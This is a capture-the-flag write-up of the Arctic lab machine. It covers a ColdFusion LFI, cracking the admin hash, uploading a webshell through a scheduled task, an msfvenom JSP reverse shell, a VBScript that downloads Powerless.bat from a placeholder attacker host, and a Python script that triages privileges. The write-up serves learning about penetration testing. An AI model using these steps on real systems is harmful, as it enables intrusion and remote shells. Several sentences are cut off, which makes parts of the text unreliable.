Noice debugger work with win10
It’s time to get a bit cooooooool, we are gonna have a look at Arctic!

Start off as usual with our nmap scan:

```
nmap -sC -sV -O -oN nmap/initial 10.10.10.11 -vv
```

We get a few results:

```
PORT      STATE SERVICE VERSION
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
```

I have no idea what fmtp might be, let’s see if we can view it in a browser. We know what CFIDE is, that’s Adobe ColdFusion. Known to have a load of vulnerabilities depending on version! Looking in that folder, we find Administrator, which brings us a login screen!

There is a known LFI in CFIDE, which lets you see the admin password, accessing it via. I’d say that password is hashed, and a quick google tells us the normal hash for this is SHA1. Copy the hash into a text file and run john against rockyou:

```
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

It comes up with a whole heap of formats it could be, but after a while it lets us know it’s cracked. Let’s check the password:

```
john --show --format=Raw-SHA1 hash.txt
```

Let’s go back to the admin login and see if the creds work! Now I’ve exploited this application before, so I have an idea! We can see that any uploaded files get saved at CFIDE/scripts. Double checking the directory listing earlier, we have access to that folder. So we should be able to upload a payload there and execute it to get a webshell or reverse shell or whatever we want! Looking in the folder, mostly the files are js or cfm. Luckily on Kali there is a default cfm webshell located in /usr/share/webshells/cfm/cfexec.cfm.

To upload a file, we need to set up a scheduled task. Under “Debugging & Logging” we have the scheduled tasks. We can’t upload a file, but we can access a URL, so let’s host our. Make sure “Save output to a file” is ticked, and we need to confirm where to save it. Heading back to the settings summary, we can see the CFIDE mapping. I guess we need to use that with \scripts on the end:

```
C:\ColdFusion8\wwwroot\CFIDE\scripts\yekki.cfm
```

We get a hit on our webserver! And our file is there! You’ll notice it’s a jsp, not sure why this is. Ah, in my autocomplete on the File path, it was a. So maybe it needs to be a jsp not a cfm. A CFM does work (as does a jsp) so either is good!

Hmm, we get an error when running a command. I think this will be because I changed the name of the file. Looking at the script, we needed to make a change before we were so reckless in our uploading! Let’s upload it and call the file yekki2.cfm. The reason to call it “2” is that I have no idea if it will overwrite files or fail at that. So it’s much easier, and fewer things can go wrong, to make a new one!

Using that webshell, let’s try whoami /all. It doesn’t look like it can find cmd.exe! How strange! Ok, instead of trying to do that, let’s make a reverse shell payload! The syntax for this is:

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.18 LPORT=9002 -f raw > yekki-rs.jsp
```

That runs and creates our reverse shell payload. Let’s host that using python and change our scheduled task to grab this file instead. We get a reverse shell and the user flag! Noice!

Let’s get my favourite Powerless script across. I have a VBScript which works like a wget, written out line by line with echo from the shell we already have (the URL was blank in the post, so ATTACKER_IP below stands for whatever python web server is hosting Powerless.bat; the first line uses > to create the file and every later line uses >> so it appends rather than overwrites):

```
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") > script1.vbs
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> script1.vbs
echo xHttp.Open "GET", "http://ATTACKER_IP/Powerless.bat", False >> script1.vbs
echo xHttp.Send >> script1.vbs
echo. >> script1.vbs
echo with bStrm >> script1.vbs
echo   .type = 1 '//binary >> script1.vbs
echo   .open >> script1.vbs
echo   .write xHttp.responseBody >> script1.vbs
echo   .savetofile "Powerless.bat", 2 '//overwrite >> script1.vbs
echo end with >> script1.vbs
```

Then run it with cscript script1.vbs and Powerless.bat lands next to it. We get a whole bunch of data, let’s see what we have!

```
Host Name:    ARCTIC
OS Name:      Microsoft Windows Server 2008 R2 Standard
```

We have a lot of privileges:

```
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

The Windows 2008 R2 box and the privileges lead me to think maybe we need to use the SeImpersonatePrivilege priv esc.
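Picking the priv esc route out of the whoami /priv output from the Powerless run is the kind of thing worth automating, so here is an added example (my own code, not from the original writeup): it parses the three-column whoami /priv format into records and reports which enabled privileges are the usual escalation primitives. The sample text is the privilege block from the post re-typed as a constant, and the ABUSABLE set is my own list, not something the post states.

```python
"""Added example: triage `whoami /priv` output for privilege-escalation primitives."""

# Privileges that routinely give SYSTEM on their own: token impersonation,
# backup/restore file access, driver loading, debug access to other processes.
# This list is the author of this example's own, not from the writeup.
ABUSABLE = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeDebugPrivilege",
    "SeLoadDriverPrivilege",
    "SeTakeOwnershipPrivilege",
    "SeTcbPrivilege",
    "SeCreateTokenPrivilege",
}

# Constructed sample: the privilege block from the Powerless output above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text: str) -> dict:
    """Map privilege name -> (description, state).

    Each data row is `<Name> <Description with spaces> <State>`: the name is the
    first token and the state the last, so the description is everything between.
    Banner, blank, header and '====' separator rows are skipped.
    """
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or not parts[0].startswith("Se"):
            continue
        name, state = parts[0], parts[-1]
        if state not in ("Enabled", "Disabled"):
            continue
        privs[name] = (" ".join(parts[1:-1]), state)
    return privs


def enabled_privileges(privs: dict) -> list:
    """Sorted names of privileges whose state is Enabled."""
    return sorted(name for name, (_, state) in privs.items() if state == "Enabled")


def triage(privs: dict) -> list:
    """Enabled privileges that are known escalation primitives, in output order.

    A privilege that is present but Disabled can usually be enabled by the
    process itself, so it is worth a second look, but only Enabled ones are
    reported here as ready to use.
    """
    return [name for name, (_, state) in privs.items()
            if state == "Enabled" and name in ABUSABLE]


if __name__ == "__main__":
    parsed = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for name in triage(parsed):
        print(f"[!] {name}: {parsed[name][0]}")
```

On the sample it flags only SeImpersonatePrivilege, which is exactly the privilege the token-impersonation (Potato-style) escalations need, matching the guess at the end of the post.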